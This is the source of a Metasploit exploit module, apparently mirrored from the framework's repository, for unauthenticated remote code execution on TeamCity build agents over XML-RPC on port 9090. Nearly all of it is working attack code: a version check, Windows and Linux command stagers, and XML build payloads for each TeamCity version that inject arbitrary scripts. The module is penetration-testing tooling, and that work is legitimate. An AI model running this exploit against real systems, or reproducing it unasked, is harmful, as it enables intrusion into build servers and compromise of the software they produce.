CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/multi/misc/teamcity_agent_xmlrpc_exec.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpClient9include Msf::Exploit::CmdStager1011def initialize(info = {})12super(update_info(info,13'Name' => 'TeamCity Agent XML-RPC Command Execution',14'Description' => %q(15This module allows remote code execution on TeamCity Agents configured16to use bidirectional communication via xml-rpc. In bidirectional mode17the TeamCity server pushes build commands to the Build Agents over port18TCP/9090 without requiring authentication. Up until version 10 this was19the default configuration. This module supports TeamCity agents from20version 6.0 onwards.21),22'Author' => ['Dylan Pindur <[email protected]>'],23'License' => MSF_LICENSE,24'References' =>25[26['URL', 'https://www.tenable.com/plugins/nessus/94675']27],28'Platform' => %w[linux win],29'Targets' =>30[31['Windows', { 'Platform' => 'win' }],32['Linux', { 'Platform' => 'linux' }]33],34'DefaultTarget' => 0,35'DisclosureDate' => '2015-04-14'))3637deregister_options('SRVHOST', 'SRVPORT', 'URIPATH', 'VHOST')38register_options(39[40Opt::RPORT(9090),41OptString.new(42'CMD',43[false, 'Execute this command instead of using command stager', '']44)45]46)47end4849def check50version = determine_version51if !version.nil? && version >= 1577252Exploit::CheckCode::Appears53else54Exploit::CheckCode::Safe55end56end5758def exploit59version = determine_version60if version.nil?61fail_with(Failure::NoTarget, 'Could not determine TeamCity Agent version')62else63print_status("Found TeamCity Agent running build version #{version}")64end6566unless datastore['CMD'].blank?67print_status('Executing user supplied command')68execute_command(datastore['CMD'], version)69return70end7172case target['Platform']73when 'linux'74linux_stager(version)75when 'win'76windows_stager(version)77else78fail_with(Failure::NoTarget, 'Unsupported target platform!')79end80end8182def windows_stager(version)83print_status('Constructing Windows payload')8485stager = generate_cmdstager(86flavor: :certutil,87temp: '.',88concat_operator: "\n",89nodelete: true90).join("\n")91stager = stager.gsub(/^(?<exe>.{5}\.exe)/, 'start "" \k<exe>')9293xml_payload = build_request(stager, version)94if xml_payload.nil?95fail_with(Failure::NoTarget, "No compatible build config for TeamCity build #{version}")96end9798print_status("Found compatible build config for TeamCity build #{version}")99send_request(xml_payload)100end101102def linux_stager(version)103print_status('Constructing Linux payload')104105stager = generate_cmdstager(106flavor: :printf,107temp: '.',108concat_operator: "\n",109nodelete: true110).join("\n")111stager << ' &'112113xml_payload = build_request(stager, version)114if xml_payload.nil?115fail_with(Failure::NoTarget, "No compatible build config for TeamCity build #{version}")116end117118print_status("Found compatible build config for TeamCity build #{version}")119send_request(xml_payload)120end121122def execute_command(cmd, version)123xml_payload = build_request(cmd, version)124125if xml_payload.nil?126fail_with(Failure::NoTarget, "No compatible build config for TeamCity build #{version}")127end128129print_status("Found compatible build config for TeamCity build #{version}")130send_request(xml_payload)131end132133def determine_version134xml_payload = %(135<?xml version="1.0" encoding="UTF-8"?>136<methodCall>137<methodName>buildAgent.getVersion</methodName>138<params></params>139</methodCall>140)141res = send_request_cgi(142{143'uri' => '/',144'method' => 'POST',145'ctype' => 'text/xml',146'data' => xml_payload.strip!147},14810149)150151if !res.nil? && res.code == 200152xml_doc = res.get_xml_document153if xml_doc.errors.empty?154val = xml_doc.xpath('/methodResponse/params/param/value')155if val.length == 1156return val.text.to_i157end158end159end160return nil161end162163def send_request(xml_payload)164res = send_request_cgi(165{166'uri' => '/',167'method' => 'POST',168'ctype' => 'text/xml',169'data' => xml_payload170},17110172)173174if !res.nil? && res.code == 200175print_status("Successfully sent build configuration")176else177print_status("Failed to send build configuration")178end179end180181def build_request(script_content, version)182case version183when 0..15771184return nil185when 15772..17794186return req_teamcity_6(script_content)187when 17795..21240188return req_teamcity_6_5(script_content)189when 21241..27401190return req_teamcity_7(script_content)191when 27402..32059192return req_teamcity_8(script_content)193when 32060..42001194return req_teamcity_9(script_content)195when 42002..46532196return req_teamcity_10(script_content)197else198return req_teamcity_2017(script_content)199end200end201202def req_teamcity_2017(script_content)203build_code = Rex::Text.rand_text_alpha(8)204build_id = Rex::Text.rand_text_numeric(8)205xml_payload = %(206<?xml version="1.0" encoding="UTF-8"?>207<methodCall>208<methodName>buildAgent.runBuild</methodName>209<params>210<param>211<value>212<![CDATA[213<AgentBuild>214<myBuildId>#{build_id}</myBuildId>215<myBuildTypeId>x</myBuildTypeId>216<myBuildTypeExternalId>x</myBuildTypeExternalId>217<myCheckoutType>ON_AGENT</myCheckoutType>218<myVcsSettingsHashForServerCheckout>x</myVcsSettingsHashForServerCheckout>219<myVcsSettingsHashForAgentCheckout>#{build_code}</myVcsSettingsHashForAgentCheckout>220<myVcsSettingsHashForManualCheckout>x</myVcsSettingsHashForManualCheckout>221<myDefaultExecutionTimeout>3</myDefaultExecutionTimeout>222<myServerParameters class="StringTreeMap">223<k>system.build.number</k>224<v>0</v>225</myServerParameters>226<myAccessCode/>227<myArtifactDependencies/>228<myArtifactPaths/>229<myArtifactStorageSettings/>230<myBuildFeatures/>231<myBuildTypeOptions/>232<myFullCheckoutReasons/>233<myParametersSpecs class="StringTreeMap"/>234<myPersonalVcsChanges/>235<myUserBuildParameters/>236<myVcsChanges/>237<myVcsRootCurrentRevisions class="tree-map"/>238<myVcsRootEntries/>239<myVcsRootOldRevisions class="tree-map"/>240<myBuildRunners>241<jetbrains.buildServer.agentServer.BuildRunnerData>242<myId>x</myId>243<myIsDisabled>false</myIsDisabled>244<myRunType>simpleRunner</myRunType>245<myRunnerName>x</myRunnerName>246<myChildren class="list"/>247<myServerParameters class="tree-map">248<entry>249<string>teamcity.build.step.name</string>250<string>x</string>251</entry>252</myServerParameters>253<myRunnerParameters class="tree-map">254<entry>255<string>script.content</string>256<string>#{script_content}</string>257</entry>258<entry>259<string>teamcity.step.mode</string>260<string>default</string>261</entry>262<entry>263<string>use.custom.script</string>264<string>true</string>265</entry>266</myRunnerParameters>267</jetbrains.buildServer.agentServer.BuildRunnerData>268</myBuildRunners>269</AgentBuild>270]]>271</value>272</param>273</params>274</methodCall>275)276return xml_payload.strip!277end278279def req_teamcity_10(script_content)280build_code = Rex::Text.rand_text_alpha(8)281build_id = Rex::Text.rand_text_numeric(8)282xml_payload = %(283<?xml version="1.0" encoding="UTF-8"?>284<methodCall>285<methodName>buildAgent.runBuild</methodName>286<params>287<param>288<value>289<![CDATA[290<AgentBuild>291<myBuildId>#{build_id}</myBuildId>292<myBuildTypeId>x</myBuildTypeId>293<myBuildTypeExternalId>x</myBuildTypeExternalId>294<myCheckoutType>ON_AGENT</myCheckoutType>295<myVcsSettingsHashForServerCheckout>x</myVcsSettingsHashForServerCheckout>296<myVcsSettingsHashForAgentCheckout>#{build_code}</myVcsSettingsHashForAgentCheckout>297<myVcsSettingsHashForManualCheckout>x</myVcsSettingsHashForManualCheckout>298<myDefaultExecutionTimeout>3</myDefaultExecutionTimeout>299<myServerParameters class="StringTreeMap">300<k>system.build.number</k>301<v>0</v>302</myServerParameters>303<myAccessCode/>304<myArtifactDependencies/>305<myArtifactPaths/>306<myBuildFeatures/>307<myBuildTypeOptions/>308<myFullCheckoutReasons/>309<myParametersSpecs class="StringTreeMap"/>310<myPersonalVcsChanges/>311<myUserBuildParameters/>312<myVcsChanges/>313<myVcsRootCurrentRevisions class="tree-map"/>314<myVcsRootEntries/>315<myVcsRootOldRevisions class="tree-map"/>316<myBuildRunners>317<jetbrains.buildServer.agentServer.BuildRunnerData>318<myId>x</myId>319<myIsDisabled>false</myIsDisabled>320<myRunType>simpleRunner</myRunType>321<myRunnerName>x</myRunnerName>322<myChildren class="list"/>323<myServerParameters class="tree-map">324<entry>325<string>teamcity.build.step.name</string>326<string>x</string>327</entry>328</myServerParameters>329<myRunnerParameters class="tree-map">330<entry>331<string>script.content</string>332<string>#{script_content}</string>333</entry>334<entry>335<string>teamcity.step.mode</string>336<string>default</string>337</entry>338<entry>339<string>use.custom.script</string>340<string>true</string>341</entry>342</myRunnerParameters>343</jetbrains.buildServer.agentServer.BuildRunnerData>344</myBuildRunners>345</AgentBuild>346]]>347</value>348</param>349</params>350</methodCall>351)352return xml_payload.strip!353end354355def req_teamcity_9(script_content)356build_id = Rex::Text.rand_text_numeric(8)357xml_payload = %(358<?xml version="1.0" encoding="UTF-8"?>359<methodCall>360<methodName>buildAgent.runBuild</methodName>361<params>362<param>363<value>364<![CDATA[365<AgentBuild>366<myBuildId>#{build_id}</myBuildId>367<myBuildTypeId>x</myBuildTypeId>368<myBuildTypeExternalId>x</myBuildTypeExternalId>369<myCheckoutType>ON_AGENT</myCheckoutType>370<myDefaultCheckoutDirectory>x</myDefaultCheckoutDirectory>371<myDefaultExecutionTimeout>3</myDefaultExecutionTimeout>372<myServerParameters class="StringTreeMap">373<k>system.build.number</k>374<v>0</v>375</myServerParameters>376<myAccessCode/>377<myArtifactDependencies/>378<myArtifactPaths/>379<myBuildFeatures/>380<myBuildTypeOptions/>381<myFullCheckoutReasons/>382<myPersonalVcsChanges/>383<myUserBuildParameters/>384<myVcsChanges/>385<myVcsRootCurrentRevisions class="tree-map"/>386<myVcsRootEntries/>387<myVcsRootOldRevisions class="tree-map"/>388<myBuildRunners>389<jetbrains.buildServer.agentServer.BuildRunnerData>390<myId>x</myId>391<myIsDisabled>false</myIsDisabled>392<myRunType>simpleRunner</myRunType>393<myRunnerName>x</myRunnerName>394<myChildren class="list"/>395<myServerParameters class="tree-map">396<entry>397<string>teamcity.build.step.name</string>398<string>x</string>399</entry>400</myServerParameters>401<myRunnerParameters class="tree-map">402<entry>403<string>script.content</string>404<string>#{script_content}</string>405</entry>406<entry>407<string>teamcity.step.mode</string>408<string>default</string>409</entry>410<entry>411<string>use.custom.script</string>412<string>true</string>413</entry>414</myRunnerParameters>415</jetbrains.buildServer.agentServer.BuildRunnerData>416</myBuildRunners>417</AgentBuild>418]]>419</value>420</param>421</params>422</methodCall>423)424return xml_payload.strip!425end426427def req_teamcity_8(script_content)428build_id = Rex::Text.rand_text_numeric(8)429xml_payload = %(430<?xml version="1.0" encoding="UTF-8"?>431<methodCall>432<methodName>buildAgent.runBuild</methodName>433<params>434<param>435<value>436<![CDATA[437<AgentBuild>438<myBuildId>#{build_id}</myBuildId>439<myBuildTypeId>x</myBuildTypeId>440<myCheckoutType>ON_AGENT</myCheckoutType>441<myDefaultCheckoutDirectory>x</myDefaultCheckoutDirectory>442<myServerParameters class="tree-map">443<entry>444<string>system.build.number</string>445<string>0</string>446</entry>447</myServerParameters>448<myAccessCode/>449<myArtifactDependencies/>450<myArtifactPaths/>451<myBuildTypeOptions/>452<myFullCheckoutReasons/>453<myPersonalVcsChanges/>454<myUserBuildParameters/>455<myVcsChanges/>456<myVcsRootCurrentRevisions class="tree-map"/>457<myVcsRootEntries/>458<myVcsRootOldRevisions class="tree-map"/>459<myBuildRunners>460<jetbrains.buildServer.agentServer.BuildRunnerData>461<myId>x</myId>462<myIsDisabled>false</myIsDisabled>463<myRunType>simpleRunner</myRunType>464<myRunnerName>x</myRunnerName>465<myChildren class="list"/>466<myServerParameters class="tree-map">467<entry>468<string>teamcity.build.step.name</string>469<string>x</string>470</entry>471</myServerParameters>472<myRunnerParameters class="tree-map">473<entry>474<string>script.content</string>475<string>#{script_content}</string>476</entry>477<entry>478<string>teamcity.step.mode</string>479<string>default</string>480</entry>481<entry>482<string>use.custom.script</string>483<string>true</string>484</entry>485</myRunnerParameters>486</jetbrains.buildServer.agentServer.BuildRunnerData>487</myBuildRunners>488<myDefaultExecutionTimeout>3</myDefaultExecutionTimeout>489<myBuildFeatures/>490</AgentBuild>491]]>492</value>493</param>494</params>495</methodCall>496)497return xml_payload.strip!498end499500def req_teamcity_7(script_content)501build_id = Rex::Text.rand_text_numeric(8)502xml_payload = %(503<?xml version="1.0" encoding="UTF-8"?>504<methodCall>505<methodName>buildAgent.runBuild</methodName>506<params>507<param>508<value>509<![CDATA[510<AgentBuild>511<myBuildId>#{build_id}</myBuildId>512<myBuildTypeId>x</myBuildTypeId>513<myCheckoutType>ON_AGENT</myCheckoutType>514<myDefaultCheckoutDirectory>x</myDefaultCheckoutDirectory>515<myServerParameters class="tree-map">516<no-comparator/>517<entry>518<string>system.build.number</string>519<string>0</string>520</entry>521</myServerParameters>522<myVcsRootOldRevisions class="tree-map">523<no-comparator/>524</myVcsRootOldRevisions>525<myVcsRootCurrentRevisions class="tree-map">526<no-comparator/>527</myVcsRootCurrentRevisions>528<myAccessCode/>529<myArtifactDependencies/>530<myArtifactPaths/>531<myBuildTypeOptions/>532<myFullCheckoutReasons/>533<myPersonalVcsChanges/>534<myUserBuildParameters/>535<myVcsChanges/>536<myVcsRootEntries/>537<myBuildRunners>538<jetbrains.buildServer.agentServer.BuildRunnerData>539<myRunType>simpleRunner</myRunType>540<myRunnerName>x</myRunnerName>541<myRunnerParameters class="tree-map">542<no-comparator/>543<entry>544<string>script.content</string>545<string>#{script_content}</string>546</entry>547<entry>548<string>teamcity.step.mode</string>549<string>default</string>550</entry>551<entry>552<string>use.custom.script</string>553<string>true</string>554</entry>555</myRunnerParameters>556<myServerParameters class="tree-map">557<no-comparator/>558<entry>559<string>teamcity.build.step.name</string>560<string>x</string>561</entry>562</myServerParameters>563</jetbrains.buildServer.agentServer.BuildRunnerData>564</myBuildRunners>565<myDefaultExecutionTimeout>3</myDefaultExecutionTimeout>566<myBuildFeatures/>567</AgentBuild>568]]>569</value>570</param>571</params>572</methodCall>573)574return xml_payload.strip!575end576577def req_teamcity_6_5(script_content)578build_id = Rex::Text.rand_text_numeric(8)579xml_payload = %(580<?xml version="1.0" encoding="UTF-8"?>581<methodCall>582<methodName>buildAgent.run</methodName>583<params>584<param>585<value>586<![CDATA[587<AgentBuild>588<myBuildId>#{build_id}</myBuildId>589<myBuildTypeId>x</myBuildTypeId>590<myPersonal>false</myPersonal>591<myCheckoutType>ON_AGENT</myCheckoutType>592<myDefaultCheckoutDirectory>x</myDefaultCheckoutDirectory>593<myServerParameters class="tree-map">594<no-comparator/>595<entry>596<string>system.build.number</string>597<string>0</string>598</entry>599</myServerParameters>600<myVcsRootOldRevisions class="tree-map">601<no-comparator/>602</myVcsRootOldRevisions>603<myVcsRootCurrentRevisions class="tree-map">604<no-comparator/>605</myVcsRootCurrentRevisions>606<myAccessCode/>607<myArtifactDependencies/>608<myBuildTypeOptions/>609<myPersonalVcsChanges/>610<myUserBuildParameters/>611<myVcsChanges/>612<myVcsRootEntries/>613<myBuildRunners>614<jetbrains.buildServer.agentServer.BuildRunnerData>615<myRunType>simpleRunner</myRunType>616<myRunnerName>x</myRunnerName>617<myRunnerParameters class="tree-map">618<no-comparator/>619<entry>620<string>script.content</string>621<string>#{script_content}</string>622</entry>623<entry>624<string>use.custom.script</string>625<string>true</string>626</entry>627</myRunnerParameters>628<myServerParameters class="tree-map">629<no-comparator/>630</myServerParameters>631</jetbrains.buildServer.agentServer.BuildRunnerData>632</myBuildRunners>633</AgentBuild>634]]>635</value>636</param>637</params>638</methodCall>639)640return xml_payload.strip!641end642643def req_teamcity_6(script_content)644build_id = Rex::Text.rand_text_numeric(8)645xml_payload = %(646<?xml version="1.0" encoding="UTF-8"?>647<methodCall>648<methodName>buildAgent.run</methodName>649<params>650<param>651<value>652<![CDATA[653<AgentBuild>654<myBuildId>#{build_id}</myBuildId>655<myBuildTypeId>x</myBuildTypeId>656<myAccessCode></myAccessCode>657<myPersonal>false</myPersonal>658<myCheckoutType>ON_AGENT</myCheckoutType>659<myDefaultCheckoutDirectory>x</myDefaultCheckoutDirectory>660<myServerParameters class="tree-map">661<no-comparator/>662<entry>663<string>system.build.number</string>664<string>0</string>665</entry>666</myServerParameters>667<myVcsRootOldRevisions class="tree-map">668<no-comparator/>669</myVcsRootOldRevisions>670<myVcsRootCurrentRevisions class="tree-map">671<no-comparator/>672</myVcsRootCurrentRevisions>673<myArtifactDependencies/>674<myBuildTypeOptions/>675<myPersonalVcsChanges/>676<myUserBuildParameters/>677<myVcsChanges/>678<myVcsRootEntries/>679<myBuildRunners>680<jetbrains.buildServer.agentServer.BuildRunnerData>681<myRunType>simpleRunner</myRunType>682<myServerParameters class="tree-map">683<no-comparator/>684</myServerParameters>685<myRunnerParameters class="tree-map">686<no-comparator/>687<entry>688<string>script.content</string>689<string>#{script_content}</string>690</entry>691<entry>692<string>use.custom.script</string>693<string>true</string>694</entry>695</myRunnerParameters>696</jetbrains.buildServer.agentServer.BuildRunnerData>697</myBuildRunners>698</AgentBuild>699]]>700</value>701</param>702</params>703</methodCall>704)705return xml_payload.strip!706end707end708709710